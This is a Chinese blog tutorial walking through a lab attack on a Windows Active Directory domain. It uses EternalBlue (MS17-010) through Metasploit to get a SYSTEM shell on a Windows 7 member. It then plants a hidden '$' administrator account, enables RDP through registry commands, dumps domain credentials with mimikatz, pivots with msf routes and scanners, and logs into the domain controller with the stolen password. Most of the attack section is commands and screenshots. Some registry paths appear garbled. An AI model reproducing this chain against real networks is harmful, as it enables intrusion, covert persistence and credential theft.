当前位置:   article > 正文

域渗透详解

域渗透

一、域环境搭建

1、子域主机:Windows7(192.168.162.134),加入域yst;

2、域控制器:Windows2008(192.168.162.150)

3、攻击主机:kali(192.168.162.131)

二、域渗透

1、信息收集:扫描获取目标网段所有主机的IP、系统版本、开放端口等信息;

(1)、ip扫描

6fe336286b3c42d9a667a810c64293ec.png

获取到子域主机IP:192.168.162.134

(2)、详细扫描

daed6e7fe83b45feb0b018a0bf2b4167.png

8e57f274f3934f27b1a58f74e0107bb0.png

目标主机开放445端口,而且系统版本是win7或者2008,主机属于YST域;

二、子域主机的渗透

该主机445端口开放,版本为win7或者2008,符合永恒之蓝漏洞(ms 17-010),所以进行尝试验证:

永恒之蓝漏洞:永恒之蓝漏洞讲解

1、msf下搜索ms 17-010

287f9aab3e034d81899190b1ef95e9d3.png

2、使用auxiliary/scanner/smb/smb_ms17_010进行判断

c53c48922c9441e58c2dcffec8f4a17b.png

配置目标主机,run,检测显示目标主机大概率存在ms17-010

3、接下来使用模块进行漏洞利用

8ea059d910c14232b933ada8fd1ef2cb.png

使用攻击模块,这次为了进行域渗透,dump密码,所以我们要拿到更高权限的shell,因此我们要配置payload

ce9e7d587ac145e7aa9c3ab1b3c478ec.png

配置完payload后,show options

dc8cfab66a044de8b7563c1c91c9a1f1.png

我们需要配置rhost(目标主机IP)和lhost(本机IP)

2bcc22b303ef4420a15336fbf6e13166.png

配置完成后,再次show options查看:

3537a128ed9f45c5a153d63baa96512c.png

进行攻击:exploit

45a9ad7dd9954c9ba0c1a496d40dbe30.png

反弹shell,进行权限查看:

f32043a7788e435086ac1e7e12279318.png

成功拿到子域主机的system权限;

三、域内成员密码dump

1、通过子域主机查看域信息

61908e61ea1e45a4aa39d71d2dea742d.png

域名为:yst.com

2、在拿下的子域主机上留后门

(1)、新建用户

54159ba4e10541b3a513c7d24881f8e1.png

 用户名后带$符,便于隐藏,用户在输入net user命令时,不显示;

(2)、net localgroup administrators rxx$ /add        #将用户rxx$加入管理员组

 (3)、开启3389端口

  1. 1、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 00000000 /f #开启3389端口
  2. 2、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 11111111 /f #关闭3389端口

c9bc3aea681248ce84a928f842ac7125.png

(3)、远程登陆

rdesktop 192.168.162.134:3389        #linux下远程桌面连接命令

78e5eadcc1334fda94bf8a4e0a887dbd.png

193d8d2c4bd44f48959a88972d48113c.png

 后门成功;

3、获取用户和密码

退出shell,加载猕猴桃(mimikatz),使用keberos模块获取明文密码

8aa60b13fa9b462cbcc962db5ca77a33.png

 四、内网域控渗透

1、内网主机发现,获取域控IP

  1. 总结的方法如下:
  2. 1、在meterpreter下:
  3. 1)、run post/windows/gather/arp_scanner rhosts=192.168.162.0/24 #基于arp协议
  4. 2)、run post/multi/gather/ping_sweep rhosts=192.168.162.0/24 #基于ping命令
  5. 3)、meterpreter >info post/multi/gather/ping_sweep
  6. 2、进入shell,在cmd下:
  7. ipconfig /all #查看用户IP信息,主要观察DNS服务器IP
  8. route print #查看路由表
  9. 两种方法对照着来,判断内网域控主机的IP地址

a4c30faeb27e454bbdcbfc29a528d004.png

通过DNS判断内网域控IP:192.168.162.150

2、端口信息扫描

  1. 1、shell下:
  2. C:\Windows\system32>exit #退出shell,返回到meterpreter
  3. 2、meterpreter下:
  4. meterpreter >backgroud #返回到msf
  5. 3、msf下:
  6. route add 192.168.162.134 255.255.255.0 1 #给msf添加路由,方便nmap进行内网扫描
  7. 路由添加成功后接下来进行内网扫描,方法如下:
  8. auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
  9. auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
  10. auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
  11. auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描
  12. 4、选择要使用的模块:
  13. (1)、use auxiliary/scanner/discovery/udp_sweep
  14. set rhosts 192.168.162.150
  15. (2)、use auxiliary/scanner/discovery/udp_probe
  16. set rhosts 192.168.162.150
  17. (3)、use auxiliary/scanner/netbios/nbname
  18. set rhosts 192.168.162.150
  19. (4)、use auxiliary/scanner/portscan/tcp
  20. set rhosts 192.168.162.150

c3cc4de270b9417c9ce0f2137da93e60.png

扫描结果如下:

9dbcbf247b194c0fa1a098733c7cf505.png

3、漏洞利用

域控主机445,3389端口开放,也可能存在ms17-010漏洞,但我们已经拿下了子域主机和域控管理员账号,所以直接利用3389进行远程连接;

(1)、kali连接域控:rdesktop 192.168.162.150:3389

642a22607d0741d1a690b4c404bf5495.png

 (2)、通过猕猴桃查到的密码进行登录

cf8075ce129a4240b69119980fe88ffb.png

 域渗透完成。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小桥流水78/article/detail/863474
推荐阅读
相关标签
  

闽ICP备14008679号